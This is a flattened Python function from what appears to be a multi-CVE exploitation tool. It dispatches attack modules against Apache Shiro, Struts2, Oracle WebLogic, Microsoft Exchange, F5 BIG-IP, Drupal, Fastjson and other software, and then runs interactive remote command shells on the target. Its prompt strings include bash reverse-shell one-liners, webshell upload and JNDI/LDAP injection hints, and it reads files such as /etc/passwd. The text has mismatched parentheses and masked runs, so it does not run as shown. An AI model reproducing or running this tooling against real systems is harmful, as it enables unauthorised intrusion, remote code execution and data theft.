def exploit(target, vul_num): target = url_check(target) if survival_check(target) == "f": print( now.timed(de=0) + color.red_warn() +" Survival check failed: " + target)) exit(0) delay = globals.get_value("DELAY") # 获取全局变量DELAY exp_apache_shiro = ApacheShiro(target) exp_apache_solr = ApacheSolr(target) exp_apache_tomcat = ApacheTomcat(target) exp_elasticsearch = Elasticsearch(target) exp_apache_flink = ApacheFlink(target) exp_jenkins = Jenkins(target) exp_spring = Spring(target) exp_nexus = Nexus(target) exp_oracle_weblogic = OracleWeblogic(target) exp_redhat_jboss = RedHatJBoss(target) exp_apache_unomi = ApacheUnomi(target) exp_thinkphp = ThinkPHP(target) exp_drupal = Drupal(target) exp_fastjson = Fastjson(target) exp_apache_struts2 = ApacheStruts2(target) exp_apache_druid = ApacheDruid(target) exp_laravel = Laravel(target) exp_vmware = Vmware(target) exp_saltstack = SaltStack(target) exp_exchange = Exchange(target) exp_big_ip = BIG_IP(target) exp_apache_ofbiz = ApacheOFBiz(target) exp_qianxin = QiAnXin(target) exp_eyou = Eyou(target) exp_ecology = Ecology(target) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target)) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num)) nc = now.timed(de=0) + color.yel_info() + color.yellow( " input \"nc\" bounce linux shell") up = now.timed(de=0) + color.yel_info() + color.yellow( " input \"upload\" upload webshell") rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow( " RMI/LDAP Server:(e.g. ldap://") bash = now.timed(de=0) + color.yel_info() + color.yellow( " nc shell: \"bash -i >&/dev/tcp/ 0>&1\"") bash_2 = now.timed(de=0) + color.yel_info() + color.yellow( " nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ 0>&1\"" ) jndi = now.timed(de=0) + color.yel_info() + color.yellow( " Reference") cmd = "whoami" # 为了消除pycharm错误提示,没啥用 file = "/etc/passwd" # 为了消除pycharm错误提示,没啥用 path = "/tmp/test" # 为了消除pycharm错误提示,没啥用 shiro_key = "1" # 为了消除pycharm错误提示,没啥用 shiro_gadget = "1" # 为了消除pycharm错误提示,没啥用 nexus_u = "admin" # 为了消除pycharm错误提示,没啥用 nexus_p = "admin" # 为了消除pycharm错误提示,没啥用 laravel_key = "null" # 为了消除pycharm错误提示,没啥用 laravel_gadget = 1 # 为了消除pycharm错误提示,没啥用 if vul_num not in explists: print( now.timed(de=0) + color.red_warn() + " The vulnerability does not support exploitation. Please refer to \"--list\"" )) sys.exit(0) elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437": if os_check() == "linux" or os_check() == "other": shiro_key = input(now.timed(de=delay) +"[+] key: ")) shiro_gadget = input( now.timed(de=delay) +"[+] gadget: ")) elif os_check() == "windows": shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ") shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) +"[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget) elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) +"[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_tomcat.cve_2020_1938_exp(file) elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) +"[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2019_3799_exp(file) elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) +"[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2020_5410_exp(file) elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) +"[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_flink.cve_2020_17519_exp(file) elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199": if os_check() == "linux" or os_check() == "other": nexus_u = input( now.timed(de=delay) +"[+] Input username: "******"[+] Input password: "******"windows": nexus_u = input( now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other": cmd = input( now.timed(de=delay) +"[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p) elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133": if os_check() == "linux" or os_check() == "other": laravel_key = input( now.timed(de=delay) +"[+] Input APP_KEY: ")) elif os_check() == "windows": laravel_key = input( now.no_color_timed(de=delay) + "[+] Input APP_KEY: ") if os_check() == "linux" or os_check() == "other": laravel_gadget = input( now.timed(de=delay) + "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")) elif os_check() == "windows": laravel_gadget = input( now.no_color_timed(de=delay) + "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) +"[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget) elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972": if os_check() == "linux" or os_check() == "other": os_type = input( now.timed(de=delay) +"[+] The target os type (linux/windows): ")) elif os_check() == "windows": os_type = input( now.no_color_timed(de=delay) + "[+] The target os type (linux/windows): ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) +"[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_vmware.cve_2021_21972_exp(cmd, os_type) elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282": if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) +"[+] upload file: ")) path = input( now.timed(de=delay) +"[+] upload path (e.g. /tmp/test.txt): ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] upload file: ") path = input( now.no_color_timed(de=delay) + "[+] upload path (e.g. /tmp/test.txt): ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) +"[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_saltstack.cve_2021_25282_exp(cmd, file, path) elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065": if os_check() == "linux" or os_check() == "other": email = input(now.timed(de=delay) +"[+] email: ")) file = input( now.timed(de=delay) +"[+] webshell name (e.g. shell.aspx): ")) elif os_check() == "windows": email = input(now.timed(de=delay) + "[+] email: ") file = input( now.no_color_timed(de=delay) + "[+] uwebshell name (e.g. shell.aspx: ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) +"[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_exchange.cve_2021_27065_exp(cmd, file, email) elif vul_num == "CVE-2021-2109" or vul_num == "cve-2021-2109": print(jndi) if os_check() == "linux" or os_check() == "other": ldap = input( now.timed(de=delay) + "[+] ldap (e.g. ldap:// ): " )) elif os_check() == "windows": ldap = input( now.no_color_timed(de=delay) + "[+] ldap (e.g. ldap:// ): " )) while True: if os_check() == "linux" or os_check() == "other": cmd = input(now.timed(de=delay) + "[+] Shell >>> ") elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_oracle_weblogic.cve_2021_2109_exp(ldap, cmd) # 远程命令执行漏洞单独简单运行 else: while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) +"[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": exit(0) elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615": exp_apache_tomcat.cve_2017_12615_exp(cmd) elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120": exp_elasticsearch.cve_2014_3120_exp(cmd) elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427": exp_elasticsearch.cve_2015_1427_exp(cmd) elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861": exp_jenkins.cve_2018_1000861_exp(cmd) elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506": exp_oracle_weblogic.cve_2017_3506_exp(cmd) elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271": print(nc) print(up) exp_oracle_weblogic.cve_2017_10271_exp(cmd) elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894": exp_oracle_weblogic.cve_2018_2894_exp(cmd) elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725": print(nc) print(up) exp_oracle_weblogic.cve_2019_2725_exp(cmd) elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729": print(nc) exp_oracle_weblogic.cve_2019_2729_exp(cmd) elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555": exp_oracle_weblogic.cve_2020_2555_exp(cmd) elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883": exp_oracle_weblogic.cve_2020_2883_exp(cmd) elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882": exp_oracle_weblogic.cve_2020_14882_exp(cmd) elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629": exp_apache_solr.cve_2017_12629_exp(cmd) elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558": exp_apache_solr.cve_2019_17558_exp(cmd) elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238": exp_nexus.cve_2019_7238_exp(cmd) elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738": exp_redhat_jboss.cve_2010_0738_exp(cmd) elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428": exp_redhat_jboss.cve_2010_1428_exp(cmd) elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501": exp_redhat_jboss.cve_2015_7501_exp(cmd) elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942": exp_apache_unomi.cve_2020_13942_exp(cmd) elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082": print(up) exp_thinkphp.cve_2019_9082_exp(cmd) elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062": exp_thinkphp.cve_2018_20062_exp(cmd) elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600": exp_drupal.cve_2018_7600_exp(cmd) elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602": exp_drupal.cve_2018_7602_exp(cmd) elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340": exp_drupal.cve_2019_6340_exp(cmd) elif vul_num == "S2-005" or vul_num == "s2-005": exp_apache_struts2.s2_005_exp(cmd) elif vul_num == "S2-008" or vul_num == "s2-008": exp_apache_struts2.s2_008_exp(cmd) elif vul_num == "S2-009" or vul_num == "s2-009": exp_apache_struts2.s2_009_exp(cmd) elif vul_num == "S2-013" or vul_num == "s2-013": exp_apache_struts2.s2_013_exp(cmd) elif vul_num == "S2-015" or vul_num == "s2-015": exp_apache_struts2.s2_015_exp(cmd) elif vul_num == "S2-016" or vul_num == "s2-016": exp_apache_struts2.s2_016_exp(cmd) elif vul_num == "S2-029" or vul_num == "s2-029": exp_apache_struts2.s2_029_exp(cmd) elif vul_num == "S2-032" or vul_num == "s2-032": exp_apache_struts2.s2_032_exp(cmd) elif vul_num == "S2-045" or vul_num == "s2-045": exp_apache_struts2.s2_045_exp(cmd) elif vul_num == "S2-046" or vul_num == "s2-046": exp_apache_struts2.s2_046_exp(cmd) elif vul_num == "S2-048" or vul_num == "s2-048": exp_apache_struts2.s2_048_exp(cmd) elif vul_num == "S2-052" or vul_num == "s2-052": exp_apache_struts2.s2_052_exp(cmd) elif vul_num == "S2-057" or vul_num == "s2-057": exp_apache_struts2.s2_057_exp(cmd) elif vul_num == "S2-059" or vul_num == "s2-059": exp_apache_struts2.s2_059_exp(cmd) elif vul_num == "S2-061" or vul_num == "s2-061": exp_apache_struts2.s2_061_exp(cmd) elif vul_num == "S2-devMode" or vul_num == "s2-devmode": exp_apache_struts2.s2_devMode_exp(cmd) elif vul_num == "VER-1224-1" or vul_num == "ver-1224-1": print(rmi_ldap) exp_fastjson.fastjson_1224_1_exp(cmd) elif vul_num == "VER-1224-2" or vul_num == "ver-1224-2": exp_fastjson.fastjson_1224_2_exp(cmd) elif vul_num == "VER-1224-3" or vul_num == "ver-1224-3": exp_fastjson.fastjson_1224_3_exp(cmd) elif vul_num == "VER-1247" or vul_num == "ver-1247": print(rmi_ldap) exp_fastjson.fastjson_1247_exp(cmd) elif vul_num == "VER-1262" or vul_num == "ver-1262": print(rmi_ldap) exp_fastjson.fastjson_1262_exp(cmd) elif vul_num == "CVE-2021-25646" or vul_num == "cve-2021-25646": print(bash_2) exp_apache_druid.cve_2021_25646_exp(cmd) elif vul_num == "CVE-2021-22986" or vul_num == "cve-2021-22986": exp_big_ip.cve_2021_22986_exp(cmd) elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) exp_big_ip.cve_2020_5902_exp(cmd) elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295": print( now.timed(de=delay) + color.yel_info() + color.yellow( " java encode:" )) exp_apache_ofbiz.cve_2021_26295_exp(cmd) elif vul_num == "CVE-2021-30128" or vul_num == "cve-2021-30128": print( now.timed(de=delay) + color.yel_info() + color.yellow( " java encode:" )) exp_apache_ofbiz.cve_2021_30128_exp(cmd) elif vul_num == "time-2021-0410" or vul_num == "TIME-2021-0410": exp_qianxin.time_2021_0410_exp(cmd) elif vul_num == "CNVD-2021-26422" or vul_num == "cnvd-2021-26422": exp_eyou.cnvd_2021_26422_exp(cmd) elif vul_num == "time-2021-0515" or vul_num == "TIME-2021-0515": exp_ecology.time_2021_0515_exp(cmd) else: pass